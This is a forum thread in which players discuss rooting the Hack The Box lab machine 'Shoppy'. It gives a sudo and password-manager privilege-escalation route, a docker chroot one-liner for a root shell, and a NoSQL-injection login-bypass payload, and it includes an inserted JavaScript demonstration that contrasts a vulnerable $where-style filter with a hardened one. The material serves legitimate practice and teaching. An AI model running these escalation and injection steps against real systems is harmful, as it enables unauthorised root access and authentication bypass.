Shoppy - HTB [Discussion]
Still working on it
Reply
You can run sudo -l to check what commands you can run; you'll see you can run, as deploy, a tool called password-manager. If you run strings on the binary you won't see the password, but if you just cat it you'll find deploy's password. Then you are able to use docker; check gtfobins to see how to get a shell as root.

I can't figure out, though, how you are able to bypass login auth on Shoppy Admin. I've never seen and couldn't find that admin'||"===' payload (if someone could explain it to me, please).
Reply
(September 17, 2022, 10:22 PM)annehathaway Wrote: You can run sudo -l to check what commands you can run; you'll see you can run, as deploy, a tool called password-manager. If you run strings on the binary you won't see the password, but if you just cat it you'll find deploy's password. Then you are able to use docker; check gtfobins to see how to get a shell as root.

I can't figure out, though, how you are able to bypass login auth on Shoppy Admin. I've never seen and couldn't find that admin'||"===' payload (if someone could explain it to me, please).

Can't find the password using cat.
Reply
You can, it is just before "Access Granted".
Reply
Rooted.

root@0c9c5cea3c46:~# cat /etc/shadow


After you log in as the deploy user, run this command.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Then you will have root.
Then run bash to get a nice shell.
Reply
root obtained, thanks. The SQLi payload is not clear to me.
Reply
(September 17, 2022, 10:51 PM)Giovanni0 Wrote: root obtained, thanks. The SQLi payload is not clear to me.


Don't get it either. After user it was a piece of cake.
Reply
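For the login-bypass question raised in the thread, here is an added illustration that is not from the original posts or from the Shoppy application itself: it assumes the login filter is built by string concatenation and then evaluated as JavaScript (the pattern a quote-and-OR payload targets), places that next to an equality filter that only ever treats input as data, and uses constructed usernames and a hypothetical `vulnerableFind`/`safeFind` pair.

```javascript
// Constructed sample user collection; not the real Shoppy database.
const users = [
  { username: 'admin', password: 'S3cret!' }, // constructed
  { username: 'josh', password: 'hunter2' },  // constructed
];

// Vulnerable pattern (assumed, not Shoppy's actual source): the login filter
// is built by string concatenation and evaluated as JavaScript, the way a
// MongoDB $where clause is. The user's input becomes part of the code.
function buildWhereClause(username) {
  return `this.username === '${username}'`;
}

function vulnerableFind(username) {
  const clause = buildWhereClause(username);
  let predicate;
  try {
    // Stand-in for the database evaluating the clause as JavaScript.
    predicate = new Function(`return (${clause});`);
  } catch (e) {
    // A clause that does not parse matches nothing (the DB would raise).
    return [];
  }
  return users.filter((u) => predicate.call(u));
}

// Hardened form: the username is only compared as a value. An equality
// filter ({ username: input }) has no expression to break out of, and
// rejecting non-strings also blocks operator objects such as { "$ne": null }.
function safeFind(username) {
  if (typeof username !== 'string') return [];
  return users.filter((u) => u.username === username);
}

// Tautology input of the same shape as the payload asked about in the thread
// (constructed): the quote closes the literal, and '1==1' is a non-empty,
// truthy string, so the OR evaluates true for every document.
const TAUTOLOGY = "admin'||'1==1";

console.log('vulnerable:', vulnerableFind(TAUTOLOGY).map((u) => u.username)); // [ 'admin', 'josh' ]
console.log('hardened:', safeFind(TAUTOLOGY).map((u) => u.username));         // []
```

The same check is what to look for in review: any login handler that interpolates request fields into a `$where` string or into query text rather than passing them as filter values.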
How did you guys find the subdomain? Was there a hint for it? I normally used subdomains-top1mil-20000.txt and that normally worked for every machine, but not for this one.
Reply
(September 17, 2022, 11:30 PM)ysoserious Wrote: How did you guys find the subdomain? Was there a hint for it? I normally used subdomains-top1mil-20000.txt and that normally worked for every machine, but not for this one.


Did you get root?
Reply
(September 17, 2022, 11:31 PM)dumpster Wrote:
(September 17, 2022, 11:30 PM)ysoserious Wrote: How did you guys find the subdomain? Was there a hint for it? I normally used subdomains-top1mil-20000.txt and that normally worked for every machine, but not for this one.


Did you get root?


Yes
Reply